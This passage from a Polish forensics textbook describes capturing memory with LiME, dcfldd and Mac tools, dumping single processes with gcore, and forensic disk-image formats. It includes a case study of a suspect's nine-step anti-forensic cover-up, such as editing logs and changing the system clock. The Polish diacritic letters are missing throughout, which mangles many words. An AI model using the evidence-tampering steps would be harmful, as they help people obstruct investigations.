Jako e nie kady umie kompilowa adowalne moduy jdra, pokazujemy, jak wykona zrzut
pamici z desktopowej wersji systemu Ubuntu 12.04. Pierwsz czynnoci jest pobranie programu
LiME ze strony podanej poniej.
W INTERNECIE
Strona do pobierania programu Linux Memory Extractor code.google.com/p/lime-forensics/downloads/list
Wersja 1.1 pakietu to zwyke uniksowe archiwum tar. Wypakuj pliki za pomoc polecenia
tar xvf <nazwapliku>, a nastpnie skompiluj LiME, wykonujc polecenie make w folderze src.
Oczywicie nie wykonuj tych czynnoci w docelowym systemie.
Po zakoczeniu kompilacji w katalogu powinien pojawi si plik z rozszerzeniem .ko.
Numer wersji w nazwie tego pliku jest numerem wersji jdra systemu. Oto jak powinien
wyglda ten plik:
[root@ubuntu src]# ls *.ko
lime-3.0.0-12-generic.ko
Miej wiadomo, e niektre dystrybucje Linuksa nie maj wymaganych nagwkw jdra
lub plikw rdowych, a s one potrzebne do kompilacji programu LiME. W takim przypadku
nagwki jdra i rda naley zainstalowa samodzielnie. W wikszoci nowoczesnych dystrybucji
systemu Linux jest to bardzo atwe i sprowadza si do uycia menedera pakietw. Potrzebne
informacje dotyczce wybranej platformy mona znale w internecie.
Wracamy teraz do skompilowanego pliku .ko: skopiuj go na wymienny nonik danych lub
w inne miejsce, w ktrym zamierzasz zapisa obraz pamici docelowego systemu. Nastpnie
przejd do tego systemu oraz zamontuj i podcz nonik z moduem LiME. Pniej zaaduj ten
modu w taki sam sposb, jak si aduje wiele innych moduw jdra, tzn. za pomoc polecenia
insmod. Przy uyciu obowizkowego parametru path okrel, co program LiME ma zrobi
z wykonanym obrazem pamici. S dwie moliwoci do wyboru: pierwsza to podanie nazwy pliku,
w ktrym ma zosta zapisany obraz, a druga to wczenie nasuchiwania przez LiME na okrelonym
porcie sieciowym i przesanie danych poczeniem, ktre si na nim pojawi. Ponadto jest jeszcze
jeden obowizkowy parametr, o nazwie format. Domylnie uywamy formatu lime, ale s dostpne
take inne. Szczegowe informacje o nich mona znale w dokumentacji programu.
Przyjrzymy si poleceniom, ktre powinny si przyda w obu wymienionych sytuacjach.
W pierwszym przypadku zamontowalimy zewntrzny napd USB do /media/usb. Chcemy
zapisa obraz pamici w katalogu /media/usb/system1_memory. W tym celu wykonujemy
nastpujce polecenie:
insmod /media/usb/lime-3.0.0-12-generic.ko
path=/media/usb/system1_memory.lime format=lime
Program LiME v1.1 nie wywietla niczego w konsoli, chyba e wystpi bd krytyczny.
Jego normalne dziaanie polega na wykonaniu zadania i powrocie do konsoli w cigu kilku minut.
Drugi przypadek to nasuchiwanie pocze na porcie sieciowym TCP i przesanie danych
przez to poczenie. Ponisze polecenie nakazuje programowi LiME nasuchiwanie pocze
na porcie TCP 4444:
insmod /media/usb/lime-3.0.0-12-generic.ko path=tcp:4444 format=lime
W systemie, w ktrym ma zosta zapisany obraz, mona poczy si z portem 4444 systemu
docelowego (w tym przypadku 192.168.100.10) za pomoc narzdzia netcat i skierowa obraz
pamici do pliku:
nc 192.168.100.10 4444 > /evidence/system1_memory.dump
Narzdzie netcat take wywietla w konsoli tylko informacje o bdach krytycznych. Jego normalne
dziaanie polega na wykonaniu zadania i powrocie do konsoli w cigu kilku minut. Jeli wykonasz
polecenie ls w katalogu wyjciowym, powiniene w nim znale plik system1_memory.dump
o spodziewanym rozmiarze. A skoro mowa o oczekiwanych rozmiarach, to jeli nie wiesz, czego si
spodziewa, moesz wywietli cakowit ilo dostpnej pamici za pomoc polecenia free:
root@ubuntu:/media/usb/system1_memory# free
total used free shared buffers cached
Mem: 1019124 929216 89908 0 21428 473820
-/+ buffers/cache: 433968 585156
Swap: 1046524 38332 1008192
W tym przypadku polecenie free informuje, e w systemie znajduje si 1 019 124 Kb (okoo 1 GB)
pamici fizycznej, wic rozmiar pliku zawierajcego jej zrzut powinien by bardzo podobny.
Zbieranie danych w systemach z jdrem typu BSD

W systemach FreeBSD, NetBSD i OpenBSD zrzut pamici mona wykona bezporednio
z urzdzenia /dev/mem za pomoc specjalnego narzdzia. Najlepiej uy programu DC3dd lub
DCFLdd. Jako e narzdzi tych standardowo si nie instaluje w systemie BSD, trzeba je pobra
z internetu lub skompilowa (w niezagroonym systemie), a nastpnie doda do zaufanego
zestawu narzdzi ledczych. Wskazwki na temat kompilowania programu DCFLdd znajduj si
w rozdziale powiconym duplikowaniu danych na potrzeby ledztwa. System BSD Ports moe te
zawiera skompilowane wersje programw DC3dd i DCFLdd. Drugi z wymienionych mona atwo
zainstalowa w systemie FreeBSD za pomoc poniszego polecenia:
pkg_add -r dcfldd
Pamitaj, aby zainstalowa docelowy system operacyjny w maszynie wirtualnej lub fizycznej,
a nastpnie skompilowa i przetestowa program w tym rodowisku, a dopiero potem przystp
do pracy w systemie docelowym. Majc program DCFLdd na noniku wymiennym lub
w odpowiednim miejscu, moesz wykona zrzut pamici za pomoc polecenia, ktrego
oglna posta przedstawia si nastpujco:
dcfldd if=/dev/mem of=/media/usb/memory.dd
hash=md5 hashlog=/media/usb/memory.log
Naley jednak mie na uwadze jedn rzecz. W najnowszych wersjach systemw z rodziny BSD
urzdzenie /dev/mem nie ma znaku koca pliku (EOF), przez co polecenie dd bdzie dziaa
w nieskoczono lub raczej spowoduje awari systemu. Rozwizaniem tego problemu jest
ustalenie limitu transferu danych dla polecenia dd za pomoc opcji count. Rozmiar pamici
fizycznej w bajtach mona sprawdzi za pomoc poniszego polecenia:
sysctl hw.physmem
W niektrych wersjach systemu BSD moe by konieczne wysanie zapytania do obiektu

hw.physmem64. Zazwyczaj robi si to, gdy polecenie hw.physmem zwraca warto ujemn.
Wynik jest podawany w bajtach:
hw.physmem: 252727296
Ze wzgldw wydajnociowych dane najlepiej przesya w porcjach wikszych ni jeden bajt.

Zalecamy wic podzielenie paczki na czci o rozmiarze 4096 bajtw jest to typowy rozmiar
strony pamici aby przesya dane w blokach po 4 kB. W przypadku przedstawionym powyej
do przesania jest w sumie 61 701 blokw o rozmiarze 4 kB (252 727 296/4096 = 61 701).
Ponisze polecenie wykona to zadanie:
dcfldd if=/dev/mem of=/media/usb/memory.dd
bs=4096 count=61701 hash=md5 hashlog=/media/usb/memory.log
Oczywicie dane naley zapisa w odpowiednim miejscu poza systemem, z ktrego pobierany
jest obraz pamici. Dobrym pomysem jest uycie udziau NFS, udziau sieciowego zaszyfrowanego
przy uyciu cryptcat lub stunnel albo nonika podczonego do portu USB.
Wykonywanie obrazu pamici w systemie Apple OS X

Mimo naszego bogatego dowiadczenia, nigdy jeszcze nie mielimy okazji wykonywa zrzutu
pamici w systemie Apple OS X. Jednak biorc pod uwag rosnc popularno tych systemw,
postanowilimy rozejrze si i poszuka jakiego narzdzia take dla nich. Znalelimy dwa
programy, ktre naszym zdaniem zapewniaj akceptowaln jako; s to Memoryze for the Mac
(firmy Mandiant) i Mac Memory Reader (firmy ATC-NY).
Memoryze for the Mac

Najpierw przyjrzymy si narzdziu Memoryze for the Mac firmy Mandiant. W wersji 1.1 program
ten umoliwia tworzenie i analizowanie obrazw pamici w nastpujcych wersjach systemu
Apple OS X:
Mac OS X Snow Leopard (10.6), 32- i 64-bitowy,
Mac OS X Lion (10.7), 32- i 64-bitowy,
Mac OS X Mountain Lion (10.8), 64-bitowy.
W INTERNECIE
Memoryze for the Mac www.mandiant.com/resources/download/mac-memoryze
Jak w kadej procedurze zbierania danych z dziaajcego systemu, pierwszym krokiem jest
umieszczenie narzdzia na zewntrznym noniku danych lub w innym miejscu dostpnym dla
systemu docelowego. Nastpnie naley przej do systemu docelowego, zamontowa nonik
lub udzia i uruchomi narzdzie, zapisujc otrzymany plik w tej samej zewntrznej lokalizacji:
system1:memoryze4mac root# ./macmemoryze dump -f system1_memory.dd

INFO: loading driver...
INFO: opening /dev/mem...
INFO: dumping memory to [system1_memory.dd]
INFO: dumping 5637144576-bytes [5376-MB]
INFO: dumping [5637144576-bytes:5376-MB 100%
INFO: dumping complete
INFO: unloading driver...
system1:memoryze4mac root#
Najwiksz wad programu Memoryze for the Mac 1.1 firmy Mandiant jest brak opcji
obliczenia skrtu kryptograficznego dla danych wynikowych.
Mac Memory Reader

Drugie ze znalezionych przez nas narzdzi to Mac Memory Reader firmy ATC-NY. Program ten
suy tylko do pobierania zawartoci pamici. Jeli trzeba, firma ATC-NY ma te osobne narzdzie
do analizy. Gdy kto naley do ktrej z amerykaskich agencji ochrony porzdku publicznego,
ma dostp do rnych darmowych narzdzi, ktre zdecydowanie warto wyprbowa.
W INTERNECIE
Mac Memory Reader cybermarshal.com/index.php/cyber-marshal-utilities/mac-memory-reader
Zapisz program MacMemoryReader na zewntrznym noniku lub w innej lokalizacji

dostpnej dla systemu docelowego. Nastpnie przejd do tego systemu docelowego, zamontuj
nonik lub udzia i uruchom narzdzie, aby na koniec zapisa zrzut pamici w tej samej lokalizacji
zewntrznej:
system1:usb root# ./MacMemoryReader -H MD5 ./system1_memory.dd
2> system1_memory.log
Polecenie to kieruje dane do pliku o nazwie system1_memory.log, doczajc do nich obliczon

w midzyczasie kryptograficzn sum kontroln MD5. Domylny format obrazu pamici to Mach-O.
Jeli wolisz surowy obraz (DD), dodaj do polecenia opcj -P.
Wykonywanie obrazu pamici dla pojedynczego procesu

Podobnie jak w systemach Windows, w systemach uniksowych czasami trzeba wykona zrzut
pamici tylko dla wybranego jednego procesu. W starych dobrych czasach wystarczyoby wykona
polecenie dd /proc/<pid>/mem, w miejsce <pid> wpisujc identyfikator procesu, ktrego pami ma
zosta zapisana w obrazie. Jednak w wikszoci nowych odmian Uniksa nie ma ju takiej moliwoci
ze wzgldw bezpieczestwa. Trzeba posuy si specjalnym narzdziem, np. gcore, sucym
do wykonywania zrzutw przestrzeni pamiciowej procesw.
Narzdzie gcore wchodzi w skad debuggera GNU (gdb). Jest to skrypt powoki uruchamiajcy
gdb, wicy si z procesem o okrelonym identyfikatorze, tworzcy zrzut i odczajcy si od procesu.
Wicej informacji, wcznie z kodem rdowym, na temat debuggera GNU mona znale na stronie,
ktrej adres podano poniej.
W INTERNECIE
Strona internetowa debuggera GNU www.gnu.org/software/gdb
Jeli gcore i gdb s ju zainstalowane w systemie poddawanym ledztwu i nie ma powodu,

aby wtpi w ich autentyczno, mona wykona zrzut pamici procesu za pomoc nastpujcego
polecenia:
gcore -o /mnt/usb/case12-tag001-pid4327-sysauthd.img 4327
Polecenie to powoduje zrzucenie pamici dla procesu o identyfikatorze 4327 do pliku o nazwie
case12-tag001-pid4327-sysauthd.img. Nazwa ta zawiera numer sprawy, numer metki oraz identyfikator
i nazw procesu. To tylko jeden z wielu moliwych sposobw nadawania nazw. Najwaniejsze jest,
aby podczas dokumentowania procesw i procedur stosowa jednolite nazewnictwo. Pomaga to
w organizacji pracy zwaszcza wtedy, kiedy przechwytuje si pami dla wielu procesw.
Czasami nie wszystko idzie tak gadko. Jeli narzdzie gcore nie jest zainstalowane lub
s podejrzenia, e haker grzeba w tym skrypcie albo majstrowa w pliku binarnym gdb lub
zwizanych z nim bibliotekach, uycie gcore bdzie utrudnione. Najprostszym rozwizaniem jest
skompilowanie statycznego pliku binarnego gdb i skopiowanie skryptu gcore z zaufanego rda.
Do tego potrzebny jest czysty system operacyjny w dokadnie takiej samej wersji jak badany system.
Naszym zdaniem w takim przypadku najlepiej zasign rady eksperta.
I CO Z TEGO
W dziaajcym systemie pracuje si po to, by wydoby z niego ulotne dane, ktre mog pozwoli
szybko znale odpowiedzi na niektre pytania. Stare podejcie polegajce na robieniu obrazw
wszystkiego czasami te jest dobre, ale rzadko efektywne. Jeli czasu jest bardzo mao lub sytuacja
jest krytyczna, prawidowe zastosowanie technik zbierania danych na ywo pozwala uniemoliwi
hakerowi wykradzenie milionw i ograniczy jego aktywno do drobnych niedogodnoci.
Dobre przygotowanie umoliwia sprawne przeprowadzenie akcji gromadzenia danych na ywo
i niedopuszczenie do tego, by ewentualny incydent przerodzi si w katastrof.
PYTANIA
1. Na jakie pytania powstae w toku ledztwa mona znale odpowiedzi po zebraniu
materiau dowodowego z dziaajcego systemu?
2. Czy naley przeprowadzi analiz na ywo we wszystkich podejrzanych systemach?
Wyjanij swoj odpowied.
3. W jakiej sytuacji pobranie obrazu pamici jest najbardziej korzystne dla ledztwa?
4. Podczas ledztwa odkrywasz podejrzany komputer z systemem operacyjnym, z ktrym
nigdy wczeniej nie miae do czynienia. Polecono Ci pobra z niego dane na ywo.
Opisz, co po kolei bdziesz robi.
ROZDZIA 8.
Duplikacja
danych ledczych
P
odczas incydentu gromadzone s due iloci danych, ktre pniej przechowuje si,
kataloguje i analizuje. Jednym z najwaniejszych rde informacji s obrazy zainfekowanych
lub podejrzanych systemw komputerowych. Cho szkodliwa aktywno moe pozosta
niewykrywalna w dziennikach zdarze i dla czujnikw sieciowych lub moe by zbyt powszechna
w innych rdach danych do analizy, czsto dowody jej obecnoci s w zasigu rki na dyskach
twardych komputerw w organizacji. W rozdziale tym opisujemy procesy, formaty i narzdzia
wykorzystywane przez specjalistw ledczych do duplikowania danych. Czasami prawo precedensowe
wymaga niszych standardw ni opisywane przez nas w tym rozdziale. W sdzie akceptowalne
mog by okrelone metody duplikacji. Jednak zadaniem zespou RI zawsze jest denie do
wygenerowania duplikatw jak najwyszej jakoci takich, dziki ktrym czonkowie zespou
i wszyscy pozostali bd mogli znale odpowiedzi na wszelkie moliwe pytania. Wyrnia si
dwa rodzaje duplikatw proste i ledcze. Prosty duplikat to zwyka kopia okrelonych
danych. Dane te mog by jednym plikiem, grup plikw, partycj na dysku twardym, caym
dyskiem twardym albo innym elementem urzdzenia magazynujcego. Natomiast duplikat
wykonany na potrzeby ledztwa to dokadna kopia danych utworzona z myl o moliwoci
wykorzystania jej jako dowodu w postpowaniu sdowym. cilej rzecz biorc, duplikat na
potrzeby ledztwa definiujemy jako obraz kadego bitu dostpnego na noniku rdowym.
Naszym zdaniem najlepiej wszystkie dane zbierane w toku dochodzenia traktowa jak potencjalne
dowody, ktre mog zosta wykorzystane w sdzie. W zwizku z tym duplikaty zawsze naley
tworzy przy uyciu oglnie przyjtych w rodowisku ledczych metod. W rozdziale tym opisujemy
niektre okolicznoci zwizane z tworzeniem duplikatw prostych i ledczych oraz przedstawiamy
najczciej stosowane metody.
Jakich narzdzi uywa do tworzenia duplikatw na potrzeby ledztwa? Na podstawie przyjtych
standardw dotyczcych dopuszczalnoci ekspertyz w procesach sdowych stwierdzamy, e narzdzie
musi sprawdzi si w obszarach wymienionych na poniszej licie. Pragniemy podkreli, e w rozdziale
tym sowo narzdzie oznacza kade rozwizanie suce do utworzenia obrazu danych. Moe to by
zarwno rozwizanie programowe, jak i sprztowe.
Narzdzie musi umoliwia wykonanie obrazu lub pobranie kadego bitu danych
dostpnych na noniku rdowym.
Narzdzie musi tworzy na potrzeby ledztwa duplikat oryginalnego nonika.
Narzdzie musi niezawodnie i elegancko obsugiwa bdy odczytu. Jeeli nie powiedzie si
kilka prb wykonania obrazu po kolei, bd powinien zosta zanotowany i proces kontynuowany.
W miejscu brakujcej informacji moe zosta wstawiony zastpnik o takim samym rozmiarze
jak luka. Zawarto zastpnika musi by szczegowo opisana w dokumentacji.
Narzdzie lub proces nie mog niczego zmienia w oryginalnym noniku danych.
Wyniki generowane przez narzdzie musz da si powtrzy i zweryfikowa przez
kogo innego.
Narzdzie musi generowa dzienniki ze szczegowym wykazem wykonywanych czynnoci
i wszelkich napotkanych bdw.
ROZDZIA 8. DUPLIKACJA DANYCH LEDCZYCH 187
Kady bit
W pierwszym punkcie powyszej listy napisalimy, e narzdzie (program lub urzdzenie)

musi duplikowa lub pobiera kady bit dostpny w noniku rdowym. Jest to nieprecyzyjny
warunek, poniewa wszystkie bity nie s dostpne. Dyski twarde i SSD s systemami magazynowymi
i udostpniaj komputerowi adresowalne sektory w sposb zaleny od wielu czynnikw.
Niektre konfiguracje, takie jak np. DCO (ang. drive configuration overlay) i HPA (ang. host
protected area chroniony obszar hosta), s dostpne, a inne, np. mechanizmy przydzielania
sektorw rwnowace obcienie dyskw SSD, s niedostpne. Kwestie dotyczce dostpu
do HPA opisujemy dalej w tym rozdziale.
Zwr uwag na brak wrd powyszych punktw wymogu uycia produktu komercyjnego.
Wielokrotnie mielimy do czynienia z niezbyt uczciwymi sprzedawcami, ktrzy zachwalali wyszo
swoich produktw nad produktami konkurencji, uywajc mao znaczcych argumentw, takich
jak ile razy dane rozwizanie zostao dopuszczone do postpowania sdowego. Dopki stosowane
przez Ciebie metody s akceptowane przez rodowisko branowe i wykonujesz je prawidowo,
jedyn zalet dajc przewag mog by walory uytkowe.
Wykorzystanie niezawodnych narzdzi do wykonywania obrazw ma kluczowe znaczenie.
Laboratorium NIST Information Technology Laboratory prowadzi program o nazwie Computer
Forensics Tools Verification, w ramach ktrego opracowuje specyfikacje procedur testowych
i wynikw m.in. narzdzi duplikujcych dane, programowych blokad zapisu, sprztowych blokad
zapisu oraz narzdzi do odzyskiwania usunitych plikw. Jeeli proces wykorzystywany przez
organizacj nie widnieje na stronie tego programu, mona wykona wasne testy, posugujc si
opublikowanym na niej planem i danymi pomocniczymi.
W INTERNECIE
NIST Computer Forensic Tool Testing (CFTT) www.nist.gov/itl/ssd/cs/cftt/cftt-projectoverview.cfm
FORMATY OBRAZW NA POTRZEBY LEDZTWA

Wikszo zespow RI tworzy i wykorzystuje trzy podstawowe rodzaje obrazw: kompletne
obrazy dyskw, obrazy partycji oraz obrazy logiczne. Kady suy do czego innego, wic naley je
zna, aby wiedzie, kiedy ich uywa i jakie wi si z tym implikacje. Cho najlepszym wyborem
jest kompletny obraz dysku, ktry zawiera utrwalon ca tre nonika, to rne uwarunkowania
technologiczne, biznesowe i wzgldy praktyczne mog zmusi nas do uycia czego innego.
W podrozdziale tym opisujemy wymienione opcje, a na rysunku 8.1 przedstawilimy zakres
moliwoci kadej z nich.
RYSUNEK 8.1. Przykad ukadu dysku
Kompletny obraz dysku

Kompletny obraz dysku tworzy si w celu zduplikowania kadej adresowalnej jednostki alokacji
na noniku. Zaliczaj si do tego obszary HPA (ang. Host Protected Area) i DCO (ang. Drive
Configuration Overlay). Cho czasami mog wystpowa pewne problemy (np. HPA, zmodyfikowane
oprogramowanie ukadowe napdu, uszkodzone sektory czy zmienione mapowanie sektorw),
teoretycznie wykonuje si obraz zawierajcy wszystkie jednostki alokacji dostpne w danym momencie.
Jeli procesu nie da si doprowadzi do koca, jak napisalimy wczeniej, fakt ten musi zosta
odpowiednio odnotowany.
Jeli zaoymy idealn sytuacj dysk twardy nie ma uszkodzonych sektorw ani obszaru
HPA oraz zgasza prawidow liczb sektorw co powinien zawiera kompletny obraz dysku?
Na rysunku 8.1 przedstawiono schemat zwykego dysku twardego, takiego jaki mona znale
w systemach OEM, np. firmy Dell albo HP. Zawiera on sektor rozruchowy, trzy partycje i troch
nieprzydzielonej do niczego przestrzeni na kocu. Jeli utworzymy kompletny obraz takiego dysku,
w pliku znajdzie si kada jednostka alokacji, ktra bya dostpna dla programu wykonujcego obraz.
Ten najbardziej kompletny z trzech wymienionych rodzajw obrazw umoliwia przejrzenie
danych znajdujcych si w blokach zarzdzania napdem, na partycjach odzyskiwania OEM,
partycjach utworzonych przez uytkownika oraz w nieprzydzielonych do niczego sektorach, ktre
kiedy mogy zawiera jakie dane. Ponadto, jeli trzeba odzyska dane czciowo nadpisane w procesie
formatowania, to najwiksze szanse powodzenia ma si wanie dziki posiadaniu kompletnego
obrazu dysku.
Pod koniec rozdziau opisujemy metody wykonywania obrazw macierzy RAID.
Gdy zaczyna si robi nudno i monotonnie, nie ma nic lepszego jak popracowa z macierz
RAID w niestabilnym stanie. Od razu wszystko staje si bardziej kolorowe.
Kilka lat temu uczestniczylimy w wewntrznym ledztwie w sprawie pewnego pracownika,

ktrego podejrzewano o uzyskanie nieautoryzowanego dostpu do sprawozda finansowych
przed zoeniem sprawozdania dla komisji papierw wartociowych i giedy. Utworzono
duplikat gwnego systemu podejrzanego (Apple MacBook Pro) oraz dostarczono kompletny
obraz dysku do analizy. ledczy posiadali informacje z dziennikw serwera wskazujce, e do
chronionych danych dostp uzyskano za pomoc konkretnej wersji przegldarki internetowej
zidentyfikowanej za pomoc acucha identyfikacyjnego.
Podejrzany wiedzia, e bdzie prowadzone dochodzenie w jego sprawie, i prbowa
zatrze lady przez przywrcenie systemu do starszej wersji zawierajcej przegldark
o numerze wczeniejszym ni odkryty przez ledczych. Ponadto pracownik ten poczyta troch
o metodach wykonywania analiz ledczych i dowiedzia si, e moe mie problemy z datami
oraz znacznikami czasu znajdujcymi si w systemie plikw. W toku ledztwa odkryto,
e podejrzany prbowa zwie ledczych, wykonujc nastpujce czynnoci.
1. Zmodyfikowa dzienniki systemowe, aby skasowa dowody wiadczce o tym,
e komputer by uywany w czasie, gdy miao miejsce zdarzenie.
2. Zmieni rozmiar partycji gwnej, aby zrobi miejsce dla drugiej.
3. Zmieni dat i godzin w komputerze.
4. Zainstalowa starsz wersj systemu operacyjnego na drugiej partycji.
5. Przenis dane uytkownika.
6. Przenis zmodyfikowane pliki dziennika.
7. Skasowa moliwo dostpu do pierwszej partycji, aby system si z niej nie uruchamia
i nie bya ona automatycznie montowana.
8. Przywrci dat i godzin komputera.
9. Zrestartowa komputer i zacz uywa nowej, cho pozornie starszej partycji,
aby wytworzy lady aktywnoci.
Mimo tych wszystkich stara, w systemie pozostao bardzo duo ladw tego procesu, cho
wikszo z nich znalaza si na oryginalnej partycji. Wprawdzie pracownik wykona dobr
robot na nowej partycji i gdyby ledczy utworzyli obraz tylko tej jednej partycji, stwierdziliby
tylko liczne anomalie na dysku i nic wicej. Znajdujce si na oryginalnym pulpicie foldery
o nazwach to edit i completed zawierajce stare i nowe wersje dziennikw nie zostayby odkryte,
poniewa do ich odzyskania konieczne byo wykonanie kompletnego obrazu dysku.
Uwaga Obszary HPA i DCO wykorzystuje si do zmieniania widocznej pojemnoci dysku. Ich pierwotnym
przeznaczeniem byo umoliwienie producentom napdw i integratorom ustawiania liczby
dostpnych sektorw w dysku twardym. Jednak znajcy si na rzeczy specjalista moe to
wykorzysta do ukrycia danych na dysku poprzez zmian jego widocznej pojemnoci. Kr rne
opowieci o wykorzystywaniu tych metod do niecnych celw, ale s to bardzo rzadkie przypadki.
Niemniej jednak naley wiedzie, e istnieje taka moliwo.
Wicej informacji o HPA, DCO i nowszych technologiach mona znale w dokumentach
publikowanych przez komisj T13 Technical Committee.
Wykonywanie obrazu partycji

Wikszo narzdzi do tworzenia obrazw na potrzeby ledztwa umoliwia wybranie tylko jednej
partycji lub jednego woluminu. Obraz partycji to cz kompletnego obrazu dysku zawierajca
wszystkie jednostki alokacji dostpne na tej partycji. Zaliczaj si do nich take przestrze
nieprzydzielona oraz niewykorzystane miejsce (ang. file slack) w obrbie partycji. Na obrazie
partycji take mona wykona niskopoziomow analiz, aby sprbowa odzyska usunite pliki
i przeanalizowa zawarto niewykorzystywanego obszaru. Jeli nawet wykonasz obrazy wszystkich
partycji, pamitaj, e na dysku znajduj si jeszcze inne obszary zawierajce dane. Zarezerwowane
obszary na pocztku lub kocu dysku, miejsca midzy partycjami oraz przestrze nieprzydzielona
do adnej partycji nie zostan w takim przypadku uwzgldnione w adnym obrazie.
Jako e obraz partycji nie zawiera wszystkich danych znajdujcych si na dysku, wykonuje si
go tylko w pewnych niezwykych sytuacjach. Czasami zdarza si tak, e wykonanie kompletnego
obrazu dysku jest niemoliwe z powodu braku odpowiednich uprawnie albo wielkoci dysku.
Jeli wwczas nie wiadomo, ktre konkretnie pliki bd potrzebne lub trzeba dodatkowo zbada
przestrze nieprzydzielon, samo kopiowanie plikw nie wchodzi w gr. W takim przypadku
najlepszym rozwizaniem moe by wanie wykonanie obrazu partycji.
Wykonywanie obrazu logicznego

Obraz logiczny to nie tyle prawdziwy obraz, co po prostu kopia i jest to ten rodzaj kopii, ktry
wczeniej nazywalimy prostym duplikatem. Cho kopie tego rodzaju wykonuje si tylko jako
ostatni desk ratunku i wikszo ledczych krzywi si na ich widok, czasami za ich utworzeniem
przemawiaj powane argumenty. Oto najczstsze powody tworzenia obrazw logicznych.
Potrzebne s konkretne pliki na danie sdu. Zdarza si, e ledczym do dziaania
potrzebne s tylko pewne pliki. Wykonanie kompletnego obrazu dysku moe by
niemoliwe z powodu ogranicze prawnych.
W ledztwie potrzebne s tylko pliki konkretnego uytkownika z urzdzenia NAS lub SAN.
Czasami odzyskanie usunitych lub utraconych elementw z urzdze NAS lub SAN jest
prawie niemoliwe z powodu powtrnego uycia obiektw lub dostpu do niskopoziomowych
struktur dyskowych, przez co niezbdne jest wykonanie kompletnego duplikatu.
Potrzebny jest duplikat danych z urzdzenia NAS lub SAN o podstawowym znaczeniu dla
dziaalnoci. Organizacja moe nie zezwoli zespoowi RI na odczenie jednostki dyskowej
od sieci, aby wykona duplikat oraz moe nie by moliwoci wykonania obrazu na ywo.
Obraz logiczny najczciej tworzy si w sytuacjach nietypowych. Gdy taka si zdarzy, naley
zapisa powody wykonania takiego obrazu do wgldu w przyszoci.
Jakich narzdzi i procesw naley uy do utworzenia obrazu logicznego? Podobnie jak
w przypadku tworzenia kompletnych duplikatw, konieczne jest udokumentowanie metadanych
plikw oraz zapisanie skrtw pozwalajcych zweryfikowa integralno informacji. Zarwno
program FTK Imager, jak i EnCase umoliwiaj tworzenie kontenerw dowodowych na pliki
logiczne. Dokumentuj metadane plikw i udostpniaj funkcje pozwalajce zapewni
integralno danych.
Co zrobi, gdy otrzyma si dane niespeniajce wymogw stawianych przez zesp RI? W naszej
pracy zdarzenia takie czsto maj miejsce administratorzy systemw przynosz dzienniki
w pamiciach USB, administratorzy maszyn wirtualnych dostarczaj pliki zwizane z maszynami
wirtualnymi (np. VMX, VMDK i VMSS), a administratorzy sieci podrzucaj nam na biurko po
12 GB przechwyconego ruchu sieciowego. W takich sytuacjach naley wszystko jak najdokadniej
udokumentowa i uywa danych tak, jakby zostay wykonane przez nasz zesp.
Integralno obrazu
Podczas tworzenia obrazu na potrzeby ledztwa kryptograficzne sumy kontrolne oblicza si z dwch
powodw. Po pierwsze, kiedy wykonywany i zapisywany jest obraz dysku odczonego od sieci
(statycznego), skrt pozwala wykaza, e obraz ten jest dokadn i prawdziw reprezentacj
oryginau. Po drugie, skrt umoliwia wykrycie ewentualnych modyfikacji wprowadzonych
w obrazie po jego wykonaniu. Podczas pracy z obrazami statycznymi sumy kontrolne su do tych
dwch celw. Jeli jednak obraz zosta wykonany w dziaajcym systemie, zawiera logiczn kopi
pliku albo orygina nie zosta zachowany z wanego powodu, skrt pozwala po prostu upewni si,
e integralno obrazu nie zostaa naruszona.
Uwaga Gdy dysk zawiera uszkodzone sektory, suma kontrolna za kadym razem moe by inna i zaley
od tego, w jaki sposb oprogramowanie ukadowe tego dysku zinterpretuje dane znajdujce si
na noniku magnetycznym. W takich sytuacjach bardzo wana jest dokadna dokumentacja
wystpujcych bdw. W przypadku uszkodzonych dyskw sumy kontrolne speniaj drug
z wymienionych wczeniej funkcji tzn. pozwalaj upewni si, e nic nie zostao zmienione
w samym obrazie.
Sposb przechowywania skrtw zaley od formatu pliku, w ktrym przechowywany jest

obraz. Istnieje kilka formatw umoliwiajcych dodanie informacji, ktre pozwalaj zweryfikowa
integralno obrazw. Dwa najczciej uywane to Advanced Forensic Framework (AFF) i Expert
Witness (EWF). Format AFF, generowany przez programy FTP firmy Access Data i SMART firmy
ASR Data, dzieli rdo na jeden lub wicej segmentw, a nastpnie zapisuje je w pliku obrazu AFF.
Format ten zapisuje sum kontroln MD5 lub SHA1 dla kadego segmentu oraz dla caego obrazu.
Format AFF mona rozszerza, tzn. umoliwia zapisywanie dowolnych metadanych, np. dodatkowych
sum kontrolnych w pliku obrazu. Program EnCase firmy Guidane Software tworzy pliki E01
(na podstawie formatu plikw Expert Witness Andrew Rosena) zawierajce sumy kontrolne dla
kadych 64 sektorw i skrt MD5 dla caego surowego obrazu dysku. W obu przypadkach skrty
suce do weryfikacji s dostpne dla analityka z poziomu aplikacji uytej do utworzenia obrazu.
Skrty te powinny zosta opisane w dokumentacji.
Jeli format pliku nie umoliwia zapisania skrtw pozwalajcych zweryfikowa integralno
obrazu, analityk (lub osoba odpowiedzialna za tworzenie obrazw) musi zapisa je samodzielnie.
W przypadku surowych formatw obrazw zrobienie tego za pomoc pewnych narzdzi jest
bardzo atwe. Program FTK Imager firmy Access Data tworzy oprcz obrazu plik tekstowy
zawierajcy informacje o sprawie, noniku rdowym, dacie i godzinie oraz skrty. Program
DCFLdd generuje skrt z nonika rdowego podczas zapisywania obrazu i opcjonalnie
zapamituje te informacje w pliku tekstowym.
W obu przypadkach naley zadba, aby skrty zostay doczone do procesu obsugi materiau
dowodowego, raportw i innych dokumentw.
Uwaga W poprzednim wydaniu tej ksiki opisalimy dwa typy obrazw na potrzeby ledztwa.
Pierwszy to obraz ledczy bdcy duplikatem caego dysku lub partycji i stanowicy reprezentacj
jeden do jednego bajtw z oryginalnego nonika. Gdyby kto wygenerowa skrt z obrazu
ledczego i oryginalnego nonika, otrzymaby identyczne wyniki. Drugi typ to kwalifikowany obraz
ledczy bdcy obrazem caego dysku lub partycji z osadzonymi dodatkowymi danymi. Formaty
plikw generowane przez programy FTK i EnCase to kwalifikowane obrazy ledcze, poniewa zawieraj
dane nagwkowe i sumy kontrolne.
Jaki format wybra
Pytanie to pojawia si w prawie kadym ledztwie, w ktrym wykonujemy obrazy danych

dla klienta. Odpowied na nie zaley od kilku czynnikw. Generalnie w systemach firmy
Microsoft zalecamy zapisywanie obrazw w formacie EWF. Pliki w tym formacie generuj
programy FTK Imager oraz EnCase Imager; mog by one analizowane przez wiele rnych
narzdzi, take o otwartym kodzie rdowym (np. uywajcych biblioteki libewf). Jeli
